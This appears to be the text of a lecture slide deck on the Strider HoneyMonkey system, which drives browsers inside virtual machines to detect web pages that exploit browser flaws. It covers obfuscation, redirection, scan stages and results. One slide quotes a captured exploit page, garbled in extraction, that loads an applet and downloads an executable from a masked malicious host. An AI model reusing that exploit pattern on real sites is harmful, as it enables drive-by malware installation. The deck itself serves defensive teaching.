Automated Web Patrol with Strider Honeymonkeys

1
Automated Web Patrol With Strider Honeymonkeys
2
A look at the Web -
3
Why do we care about spam?

• Users want to
• - Look at quality pages on the web
• - Interact without the trouble of moderation
• - Surf safely
• Search engines want to -
• - Attract traffic
• - Provide good search results
• - Profit from ads

4
Web Patrol
Need of the hour
Why automated web patrol ?
We implement automated web patrol system which
uses strider honeymonkey programs that run within
virtual machines.
1. Manual analyses are expensive. 2.
Automated Web Patrol aims to
significantly reduce the cost of
monitoring malicious Web sites 3. Can
capture those responsible for malicious
acts. 4. More efficient
5
Strider Honeymonkeys

• A monkey program drives the
• browser in a way that mimics
• a human users operation.
• Dynamic and active way of
• detecting threats Honeymonkey.
• Assesses the harmful code injection strider
  honeymonkey.
• Logs and reports are generated after the alarm
  is set off.

6
HoneyMonkeys
Basic Functionalities

• 1. OSs of various patch levels
• Mimic human web browsing
• Uses StriderTracer to catch
• file creation and system configuration
  changes
• 3. Discover malicious
• web sites

OS 3
OS 2
OS 1
MALCODE
7
BROWSER BASED VULNERABILITIES
Code Obfuscation
Deliberately adding Confusion
URL redirection
Re-directing the user to other sites
Vulnerability exploitation
Exploiting multiple browser vulnerabilities
Malware installation
Installing Viruses, worms Trojans
8
Obfuscation

• Internet based activities that subvert web
  technologies
• Phishing (fraud)
• Traffic redirection
• Hosting of illegal sites

Eg. URL Obfuscation
http//www.usfca.edu_at_www.cse.scu.edu/tschwarz/coe
n252_03/index.html
URL rules interpret this as a userid.
Hide this portion of the URL.
9
Obfuscation methods

• Dynamic code injection using document.write()
• (2) Long strings with encoded characters are
  decoded by unescape() function
• (3) Custom decoding routine included in a script
  
• (4) Sub string is replaced using replace()
  function. Obfuscation limits the ability of
  detectors to detect attacks that leverage exploit
  code.

10
URL Redirection

• Primary URL Secondary URL
• Protocol redirection using HTTP 302 temporary
  redirect
• HTML Tags
• Script functions including window.location.repl
  ace().

http//IP address / 8 chars/ test2/ iejp.htm
http//IP address
PRIMARY
SECONDARY
USER
11
Vulnerability Exploitation
Example of vulnerability
Exploit 1
lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/spl
oit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt Try document.write(
'ltobject data1091154510511611558
109104116109108581021051081015
8// C\fo''o.mht!''http//vxxxx''xxe.biz//adv
''erts//033//targ.ch''m/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgtlt/bodygtlt/htmlgt
Exploit 2
Exploit 3
12
Malware Installation

• Viruses
• Backdoor functions
• Bot programs
• Trojan downloaders
• Trojan droppers
• Trojan proxies
• Spyware programs

13
HoneyMonkey Stage 1
Honeymonkey System

• Visit n URLs simultaneously
• If exploit detected, re-visit each one
  individually until exploit URL is found

VM U1 U2 U3 U4 U5
U6
VM U1 U2
14
HoneyMonkey Stage 2
Honeymonkey System

• Re-scan exploit URLs
• Perform recursive redirection analysis
• Identify all web pages involved

VM U2 U3 U2
U3
VM U2 U3 U9
U10
15
HoneyMonkey Stage 3
Honeymonkey System

• Re-scan exploit URLs
• Scan using fully patched VMs
• Identify attacks exploiting the latest
  vulnerabilities

VM U2 U3 U9
U10
VM U2 U9
16
FLOWCHART / REPORT

• Scan up to 500-700 URLs per day

17
Input URL Lists
Output URL Data

• Exploit URLs
• Measures risk of visiting
  similar web sites.
• Topology Graphs
• Several URLs shut down provide leads for
  anti-spyware research.
• Zero-day exploits
• Monitors URL upgrades.

• Suspicious URLs
• Known to host spyware or malware.
• Links appearing in phishing or spam messages.
• Most popular web sites
• Top 100,000 by browser traffic ranking.
• Local URLs
• Organization want to verify web pages have not
  been compromised.

18
EXPERIMENTAL RESULTS

• Collected 16,000 URLs
• Web search of known-bad web sites
• Web search for Windows hosts files
• Depth-2 crawling of previous URLs
• 207/16,190 1.28 of web sites

• All tests done using IEv6

19
TOPOLOGY GRAPHS / NODE RANKING

• 17 exploit URLs for SP2-PP
• Most powerful exploit pages

20
SITE RANKING

• Based on connection counts -

• Based on number of exploit-URLs hosted -

21
Effective Monitoring

• Exploit URLs
• Useful for detecting zero day exploits
• Content providers with
• well-known URLs must maintain these URLs to
  keep high traffic
• Highly ranked URLs
• More likely to upgrade exploits

Scanning popular URLs
22

• Strenghts

• Weaknesses

• HoneyMonkey will detect most
• Trojan viruses
• Backdoor functions
• Spyware programs
• Uniform detection of exploits
• Known vulnerability attack
• Zero-day exploits
• Generates XML report for each visit

• Takes time to clean infected machine after each
  site visit.
• Obfuscation escapes anti-virus S/W
• HM waits only 2 mins /URL
• -Delay exploit on pages
• Attacks may be randomized, confusing the HMs
• HM can be detected by sending dialog box.

23
Scope for Improvements

• Run HoneyMonkey with random wait times
• Combat delayed exploits on sites.
• Randomize HoneyMonkey attack
• Vulnerability-specific exploit detector
• Insert break points within
• bad code.
• Stops execution before
• potentially malicious code.
• They need to work on accuracy
• They need more classification
• according to contents
• They should improve on avoiding
• detection by the honey monkeys

24
Thank You
Any Questions